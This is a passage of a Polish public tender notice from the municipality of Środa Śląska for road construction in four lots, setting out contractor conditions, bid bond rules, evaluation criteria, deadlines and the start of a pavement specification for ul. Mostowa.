1. Określenie warunków: Wykonawca spełnia warunek, jeżeli jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 100 000,00 PLN (słownie: sto tysięcy 00/100 PLN). 
Ocena spełnienia warunku na zasadzie spełnia - nie spełnia

Część II
2. Określenie warunków: Wykonawca spełnia warunek, jeżeli jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 100 000,00 PLN (słownie: sto tysięcy 00/100 PLN). 
Ocena spełnienia warunku na zasadzie spełnia - nie spełnia
Część III
3. Określenie warunków: Wykonawca spełnia warunek, jeżeli jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 100 000,00 PLN1 (słownie: sto tysięcy 00/100 PLN). 
Ocena spełnienia warunku na zasadzie spełnia - nie spełnia
Część IV
4. Określenie warunków: Wykonawca spełnia warunek, jeżeli jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 100 000,00 PLN (słownie: sto tysięcy 00/100 PLN). 
Ocena spełnienia warunku na zasadzie spełnia - nie spełnia<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Część I
Określenie warunków:
5. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada niezbędną wiedzę i doświadczenie do wykonania przedmiotu zamówienia, tj.: wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej 
2 roboty budowlane odpowiadających swoim rodzajem przedmiotowi zamówienia (wykonanie dróg o nawierzchni z kostki betonowej   500,00 m2     ) Wartość robót   nie mniejsza niż  100 000,00 zł brutto każda. Dokument musi potwierdzać wymagany zakres prac, ich wartość, datę wykonania i miejsce realizacji ( budowa lub przebudowa drogi o nawierzchni z kostki betonowej ).
 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej 1 osobą posiadającą uprawnienia do samodzielnego kierowania, nadzorowania i kontrolowania robót drogowych w pełnym zakresie - kierownik budowy  posiadający uprawnienia w branży drogowej.
Wykonawca zobligowany jest wypełnić załącznik do SIW Z tj.  Wykaz osób które będą uczestniczyć w wykonaniu zamówieniu i złożyć oświadczenie zgodnie z załącznikiem i treścią Specyfikacji istotnych warunków zamówienia
Ocena spełnienia warunku na zasadzie spełnia - nie spełnia
Zamawiający nie wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób.

Część II
Określenie warunków:
6. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada niezbędną wiedzę i doświadczenie do wykonania przedmiotu zamówienia, tj.: wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej 
2 roboty budowlane odpowiadających swoim rodzajem przedmiotowi zamówienia (wykonanie dróg o nawierzchni z kostki betonowej   500,00 m2     ) Wartość robót   nie mniejsza niż  100 000,00 zł brutto każda.	Dokument musi potwierdzać wymagany zakres prac, ich wartość, datę wykonania i miejsce realizacji ( budowa lub przebudowa drogi o nawierzchni z kostki betonowej ).
 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej 1 osobą posiadającą uprawnienia do samodzielnego kierowania, nadzorowania i kontrolowania robót drogowych w pełnym zakresie - kierownik budowy  posiadający uprawnienia w branży drogowej.
Wykonawca zobligowany jest wypełnić załącznik do SIW Z tj.  Wykaz osób które będą uczestniczyć w wykonaniu zamówieniu i złożyć oświadczenie zgodnie z załącznikiem i treścią Specyfikacji istotnych warunków zamówienia
Ocena spełnienia warunku na zasadzie spełnia - nie spełnia
Zamawiający nie wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób.
Część III
Określenie warunków:
7. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada niezbędną wiedzę i doświadczenie do wykonania przedmiotu zamówienia, tj.: wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej 
2 roboty budowlane odpowiadających swoim rodzajem przedmiotowi zamówienia (wykonanie dróg o nawierzchni z kostki betonowej   500,00 m2     ) Wartość robót   nie mniejsza niż  100 000,00 zł brutto każda.	Dokument musi potwierdzać wymagany zakres prac, ich wartość, datę wykonania i miejsce realizacji ( budowa lub przebudowa drogi o nawierzchni z kostki betonowej ).
 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej 1 osobą posiadającą uprawnienia do samodzielnego kierowania, nadzorowania i kontrolowania robót drogowych w pełnym zakresie - kierownik budowy  posiadający uprawnienia w branży drogowej.
Wykonawca zobligowany jest wypełnić załącznik do SIW Z tj.  Wykaz osób które będą uczestniczyć w wykonaniu zamówieniu i złożyć oświadczenie zgodnie z załącznikiem i treścią Specyfikacji istotnych warunków zamówienia
Ocena spełnienia warunku na zasadzie spełnia - nie spełnia
Zamawiający nie wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób.
Część IV
Określenie warunków:
8. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada niezbędną wiedzę i doświadczenie do wykonania przedmiotu zamówienia, tj.: wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej 
2 roboty budowlane odpowiadających swoim rodzajem przedmiotowi zamówienia (wykonanie dróg o nawierzchni z kostki betonowej   500,00 m2     ) Wartość robót   nie mniejsza niż  100 000,00 zł brutto każda. 	Dokument musi potwierdzać wymagany zakres prac, ich wartość, datę wykonania i miejsce realizacji ( budowa lub przebudowa drogi o nawierzchni z kostki betonowej ).
 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej 1 osobą posiadającą uprawnienia do samodzielnego kierowania, nadzorowania i kontrolowania robót drogowych w pełnym zakresie - kierownik budowy  posiadający uprawnienia w branży drogowej oraz  musi wykazać, że dysponuje co najmniej 1 osobę posiadającą  uprawnienia do projektowania zadań w zakresie drogownictwa.
Wykonawca zobligowany jest wypełnić załącznik do SIW Z tj.  Wykaz osób które będą uczestniczyć w wykonaniu zamówieniu i złożyć oświadczenie zgodnie z załącznikiem i treścią Specyfikacji istotnych warunków zamówienia
Ocena spełnienia warunku na zasadzie spełnia - nie spełnia<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt 12-23 ustawy Pzp.
odpis z właściwego rejestru lub centralnej ewidencji informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy PZP.  </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej zamawiający będzie wymagał następujących dokumentów: a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty; b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego dokumentów, o których mowa w pkt. 2, zamawiający może dopuścić złożenie przez wykonawcę innych odpowiednich dokumentów w celu potwierdzenia spełniania warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej. Jeżeli wykaz, oświadczenia lub inne złożone przez wykonawcę dokumenty budzą wątpliwości zamawiającego, może on zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane, dostawy lub usługi były wykonane, a w przypadku świadczeń okresowych lub ciągłych, są nadal wykonywane, o dodatkowe informacje lub dokumenty w tym zakresie.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Formularz ofertowy (wzór  załącznik nr 1 do SIWZ)  wypełniony przez Wykonawcę,
2) Oświadczenia wymienione w Rozdziale IX i X  SIWZ,
3) Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy  jeżeli dotyczy. Pełnomocnictwa winny być przedłożone w formie oryginału lub kopii poświadczonej notarialnie.
4) Kosztorys ofertowy uproszczony opracowany dowolna metoda kosztorysową. Zawierający czynniki cenotwórcze, jak
stawka robocizny -               .......
koszty pośrednie -                ........
zysk -                                    ........
koszty zakupu materiałów - ........
5)  Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów w celu realizacji zamówienia, przedstawia w szczególności zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
6) W terminie 3 dni od zamieszczenia na stronie internetowej zamawiającego informacji z otwarcia ofert, o której mowa w art. 86 ust.5 ustawy PZP, Wykonawca zobowiązany jest przekazać Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy PZP Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości: 
Część 1  10.000,00 zł. 
Część 2    8.000,00 zł 
Część 3 -   15.350,00 zł 
Część 4 -   10.500,00 zł 
2.	Wadium musi zostać wniesione przed upływem terminu składania ofert. Wadium wniesione w pieniądzu musi być na wskazanym koncie poniżej w dniu i godzinie składania ofert wskazanym w dalszej części SIWZ. 
3.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2014, poz. 1804 oraz z 2015 r. poz. 978 i 1240).
4.	Wadium wniesione w formach innych niż pieniądz (gwarancje, poręczenia) muszą mieć charakter bezwarunkowy i nieodwołalny (tzw. gwarancja na pierwsze żądanie) oraz muszą zostać przedłożone w formie oryginału. Gwarancja zapłaty wadium musi być ważna co najmniej przez cały okres związania ofertą, tj. 30 dni. W przypadku przedłożenia kopii dokumentu, lub jeżeli dokument nie będzie spełniał wymagań formalnych - oferta nie będzie zabezpieczona wadium i jako taka podlegać będzie odrzuceniu. (art. 89 ust. 1 pkt 7b ustawy PZP). W dokumencie złożonej gwarancji bankowej, ubezpieczeniowej muszą być zawarte wszystkie możliwości zatrzymania wadium przez Zamawiającego określone w art. 46 ustawy PZP, 
Lub 
Gwarancja będzie zawierała klauzulę o treści: Podejmujemy się bezwarunkowo i nieodwołalnie wypłacenia zamawiającemu kwoty do wysokości określonej powyżej po otrzymaniu pierwszego pisemnego żądania, bez konieczności jego uzasadnienia, o ile zamawiający stwierdzi w swoim żądaniu, że kwota roszczenia jest mu należna w związku z zaistnieniem, co najmniej jednego z warunków zatrzymania wadium, określonego w ustawie z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
5.	Wadium wnoszone w pieniądzu musi zostać wpłacone przelewem na rachunek bankowy Zamawiającego, Gmina Środa Śląska; Pl. Wolności 5, 55-300 Środa Śląska Bank PKO BP nr konta 79 1020 5242 0000 2802 0158 7898 z zaznaczeniem: wadium na Budowa  dróg    (część nr )    WZP 271.1-38/16
6.	W przypadku wnoszenia wadium w formie niepieniężnej należy załączyć do oferty potwierdzoną kserokopię a oryginał - należy złożyć oddzielnie w kasie Urzędu Miejskiego. 
7.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczenia, o którym mowa w art. 25a ust. 1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
9.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
10.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
11.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
13.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
14.	Okres ważności wadium musi obejmować okres związania ofertą.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena zamówienia</td><td>60</td></tr><tr><td>termin wykonania zamówienia</td><td>11</td></tr><tr><td>gwarancja</td><td>22</td></tr><tr><td>termin płatności</td><td>7</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zgodnie z art. 144 ust. 1 PZP zamawiający zastrzega sobie możliwość zamiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w tym: 
a) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności, np. działania osób trzecich uniemożliwiające wykonanie zamówienia w terminie umownym, 
b) wystąpienia siły wyższej tj. wydarzenia nieprzewidywalnego i poza kontrolą stron niniejszej umowy, występującej po podpisaniu umowy, a powodującego niemożność wywiązania się z umowy w jej obecnym brzmieniu; 
c) zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego
d) konieczności wykonania robót dodatkowych i uzupełniających.
2. Wszelkie Zmiany postanowień umowy w stosunku do treści oferty wymaga formy pisemnej w formie aneksu<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 05/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>1. Budowa nawierzchni odcinka ul. Mostowej do posesji 20 i 20B w Środzie Śląskiej 2. Budowa nawierzchni drogi ul. Brodatego i części ul. Probusa w Środzie Śląskiej wraz z kanalizacją deszczową<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ i
1. Budowa nawierzchni odcinka ul. Mostowej do posesji 20 i 20B w Środzie Śląskiej
Projektuje się sięgacz o długości 130 m o nawierzchnie jednoprzestrzennej i szer. 4,50m.
W ciągu sięgacza projektuje się zjazdy na przylegające posesje.
Sięgacz będzie posiadał spadek jednostronny.
KONSTRUKCJA NAWIERZCHNI
Dla projektowanej nawierzchni ciągu pieszo-jezdnego i zjazdów przewidziano następujący układ warstw konstrukcyjnych:
- kostka bet. gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/31,5 gr. 10 cm
- kruszywo łamane stab. mechanicznie 0/63 gr. 20 cm
